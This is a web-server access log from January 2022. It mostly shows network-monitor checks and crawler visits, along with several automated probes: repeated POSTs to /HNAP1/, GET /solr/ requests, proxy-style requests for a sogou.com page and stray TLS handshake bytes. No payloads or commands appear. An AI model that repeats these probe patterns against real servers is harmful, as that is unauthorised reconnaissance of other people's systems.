162.231.187.135 - - [03/Jan/2022:20:14:35 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:20:15:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:16:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:20:16:35 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:20:17:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:18:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:20:18:36 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:20:19:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:20:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:21:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:22:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.56.56.78 - - [03/Jan/2022:20:23:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Jan/2022:20:23:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.56.56.78 - - [03/Jan/2022:20:23:25 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
103.55.106.70 - - [03/Jan/2022:20:24:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [03/Jan/2022:20:24:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:25:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:26:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.56 - - [03/Jan/2022:20:26:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm);googlebot|baiduspider|baidu|spider|sogou|bingbot|bot|yahoo|soso|sosospider|360spider|youdaobot|jikeSpider;)"
212.91.246.72 - - [03/Jan/2022:20:27:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.222.253.10 - - [03/Jan/2022:20:28:09 +0100] "GET /robots.txt HTTP/1.1" 404 334 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.132 - - [03/Jan/2022:20:28:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.91.246.72 - - [03/Jan/2022:20:28:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
186.155.241.149 - - [03/Jan/2022:20:28:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [03/Jan/2022:20:29:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:30:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:31:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:32:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.202 - - [03/Jan/2022:20:32:46 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:20:33:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:34:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:35:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:36:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:37:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:38:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:39:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:40:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:41:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
136.144.41.117 - - [03/Jan/2022:20:41:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [03/Jan/2022:20:42:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:43:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:44:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:45:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:46:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:47:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:48:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.56.56.78 - - [03/Jan/2022:20:48:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
2.56.56.78 - - [03/Jan/2022:20:49:00 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
103.76.190.73 - - [03/Jan/2022:20:49:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:20:49:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:50:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:51:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:52:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:53:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:54:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:55:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:56:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:57:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:58:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:20:59:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:00:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:01:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.56.57.56 - - [03/Jan/2022:21:02:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Jan/2022:21:02:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.56.57.56 - - [03/Jan/2022:21:02:29 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [03/Jan/2022:21:03:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.194 - - [03/Jan/2022:21:03:39 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:21:04:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:05:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:06:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:07:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.73.191.219 - - [03/Jan/2022:21:07:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:21:08:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:09:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:10:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:11:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:12:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.140.248.32 - - [03/Jan/2022:21:13:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
212.91.246.72 - - [03/Jan/2022:21:13:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:14:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
136.144.41.117 - - [03/Jan/2022:21:14:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [03/Jan/2022:21:15:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.75.85.103 - - [03/Jan/2022:21:15:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
106.75.85.103 - - [03/Jan/2022:21:15:53 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:21:16:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:17:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:18:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:19:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:20:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.233.62.116 - - [03/Jan/2022:21:21:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
35.195.93.98 - - [03/Jan/2022:21:21:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
212.91.246.72 - - [03/Jan/2022:21:21:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:22:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:23:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.161.37 - - [03/Jan/2022:21:23:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
183.136.225.56 - - [03/Jan/2022:21:24:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm);googlebot|baiduspider|baidu|spider|sogou|bingbot|bot|yahoo|soso|sosospider|360spider|youdaobot|jikeSpider;)"
222.186.19.235 - - [03/Jan/2022:21:24:15 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19"
222.186.19.235 - - [03/Jan/2022:21:24:15 +0100] "\x16\x03\x01" 501 318 "-" "-"
222.186.19.235 - - [03/Jan/2022:21:24:15 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 v1333515017.9196"
212.91.246.72 - - [03/Jan/2022:21:24:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.131.22.118 - - [03/Jan/2022:21:24:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Jan/2022:21:25:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:26:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:27:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:28:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:29:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.138.211.71 - - [03/Jan/2022:21:29:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:21:30:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:31:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:32:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:33:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:34:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:35:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.96.130.19 - - [03/Jan/2022:21:36:08 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Jan/2022:21:36:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:37:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:38:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:39:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:40:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:41:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:42:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.129.56.200 - - [03/Jan/2022:21:42:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
45.154.255.147 - - [03/Jan/2022:21:42:37 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:21:43:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:44:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:45:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:46:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:47:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.56.56.78 - - [03/Jan/2022:21:47:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
2.56.56.78 - - [03/Jan/2022:21:47:46 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
23.251.102.74 - - [03/Jan/2022:21:48:00 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.53.210 - - [03/Jan/2022:21:48:03 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Jan/2022:21:48:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:49:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:50:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:51:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:52:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:53:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:54:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:21:55:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:21:55:40 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:21:56:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.186.19.235 - - [03/Jan/2022:21:56:53 +0100] "\x16\x03\x01" 501 318 "-" "-"
222.186.19.235 - - [03/Jan/2022:21:56:53 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5"
222.186.19.235 - - [03/Jan/2022:21:56:53 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.4 Safari/532.0"
212.91.246.72 - - [03/Jan/2022:21:57:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:21:57:41 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:21:58:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
136.144.41.117 - - [03/Jan/2022:21:58:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [03/Jan/2022:21:59:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:21:59:41 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:22:00:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:22:01:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:22:01:41 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:22:02:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.60 - - [03/Jan/2022:22:02:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.60 - - [03/Jan/2022:22:02:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Jan/2022:22:03:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
